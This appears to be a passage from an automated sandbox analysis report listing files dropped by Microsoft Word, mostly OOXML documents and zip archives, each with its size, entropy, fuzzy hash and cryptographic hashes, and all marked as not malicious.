                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):558035
                                    Entropy (8bit):7.696653383430889
                                    Encrypted:false
                                    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):570901
                                    Entropy (8bit):7.674434888248144
                                    Encrypted:false
                                    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):523048
                                    Entropy (8bit):7.715248170753013
                                    Encrypted:false
                                    SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                    MD5:C276F590BB846309A5E30ADC35C502AD
                                    SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                    SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                    SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3078052
                                    Entropy (8bit):7.954129852655753
                                    Encrypted:false
                                    SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                    MD5:CDF98D6B111CF35576343B962EA5EEC6
                                    SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                    SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                    SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):777647
                                    Entropy (8bit):7.689662652914981
                                    Encrypted:false
                                    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                    MD5:B30D2EF0FC261AECE90B62E9C5597379
                                    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):924687
                                    Entropy (8bit):7.824849396154325
                                    Encrypted:false
                                    SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                    MD5:97EEC245165F2296139EF8D4D43BBB66
                                    SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                    SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                    SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):966946
                                    Entropy (8bit):7.8785200658952
                                    Encrypted:false
                                    SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                    MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                    SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                    SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                    SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1204049
                                    Entropy (8bit):7.92476783994848
                                    Encrypted:false
                                    SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                    MD5:FD5BBC58056522847B3B75750603DF0C
                                    SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                    SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                    SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):486596
                                    Entropy (8bit):7.668294441507828
                                    Encrypted:false
                                    SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                    MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                    SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                    SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                    SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):976001
                                    Entropy (8bit):7.791956689344336
                                    Encrypted:false
                                    SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                    MD5:9E563D44C28B9632A7CF4BD046161994
                                    SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                    SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                    SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):1463634
                                    Entropy (8bit):7.898382456989258
                                    Encrypted:false
                                    SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                    MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                    SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                    SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                    SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2218943
                                    Entropy (8bit):7.942378408801199
                                    Encrypted:false
                                    SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                    MD5:EE33FDA08FBF10EF6450B875717F8887
                                    SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                    SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                    SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1750795
                                    Entropy (8bit):7.892395931401988
                                    Encrypted:false
                                    SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                    MD5:529795E0B55926752462CBF32C14E738
                                    SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                    SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                    SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2924237
                                    Entropy (8bit):7.970803022812704
                                    Encrypted:false
                                    SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                    MD5:5AF1581E9E055B6E323129E4B07B1A45
                                    SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                    SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                    SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2357051
                                    Entropy (8bit):7.929430745829162
                                    Encrypted:false
                                    SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                    MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                    SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                    SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                    SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3611324
                                    Entropy (8bit):7.965784120725206
                                    Encrypted:false
                                    SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                    MD5:FB88BFB743EEA98506536FC44B053BD0
                                    SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                    SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                    SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1091485
                                    Entropy (8bit):7.906659368807194
                                    Encrypted:false
                                    SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                    MD5:2192871A20313BEC581B277E405C6322
                                    SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                    SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                    SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):608122
                                    Entropy (8bit):7.729143855239127
                                    Encrypted:false
                                    SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                    MD5:8BA551EEC497947FC39D1D48EC868B54
                                    SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                    SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                    SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5783
                                    Entropy (8bit):7.88616857639663
                                    Encrypted:false
                                    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                    MD5:8109B3C170E6C2C114164B8947F88AA1
                                    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4026
                                    Entropy (8bit):7.809492693601857
                                    Encrypted:false
                                    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4243
                                    Entropy (8bit):7.824383764848892
                                    Encrypted:false
                                    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                    MD5:7BC0A35807CD69C37A949BBD51880FF5
                                    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):16806
                                    Entropy (8bit):7.9519793977093505
                                    Encrypted:false
                                    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                    MD5:950F3AB11CB67CC651082FEBE523AF63
                                    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):11380
                                    Entropy (8bit):7.891971054886943
                                    Encrypted:false
                                    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                    MD5:C9F9364C659E2F0C626AC0D0BB519062
                                    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):6024
                                    Entropy (8bit):7.886254023824049
                                    Encrypted:false
                                    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):9191
                                    Entropy (8bit):7.93263830735235
                                    Encrypted:false
                                    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4326
                                    Entropy (8bit):7.821066198539098
                                    Encrypted:false
                                    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                    MD5:D32E93F7782B21785424AE2BEA62B387
                                    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):7370
                                    Entropy (8bit):7.9204386289679745
                                    Encrypted:false
                                    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                    MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5596
                                    Entropy (8bit):7.875182123405584
                                    Encrypted:false
                                    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                    MD5:CDC1493350011DB9892100E94D5592FE
                                    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):3683
                                    Entropy (8bit):7.772039166640107
                                    Encrypted:false
                                    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                    MD5:E8308DA3D46D0BC30857243E1B7D330D
                                    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):4888
                                    Entropy (8bit):7.8636569313247335
                                    Encrypted:false
                                    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6448
                                    Entropy (8bit):7.897260397307811
                                    Encrypted:false
                                    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                    MD5:42A840DC06727E42D42C352703EC72AA
                                    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):5630
                                    Entropy (8bit):7.87271654296772
                                    Encrypted:false
                                    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6193
                                    Entropy (8bit):7.855499268199703
                                    Encrypted:false
                                    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                    MD5:031C246FFE0E2B623BBBD231E414E0D2
                                    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3075
                                    Entropy (8bit):7.716021191059687
                                    Encrypted:false
                                    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                    MD5:67766FF48AF205B771B53AA2FA82B4F4
                                    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5151
                                    Entropy (8bit):7.859615916913808
                                    Encrypted:false
                                    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
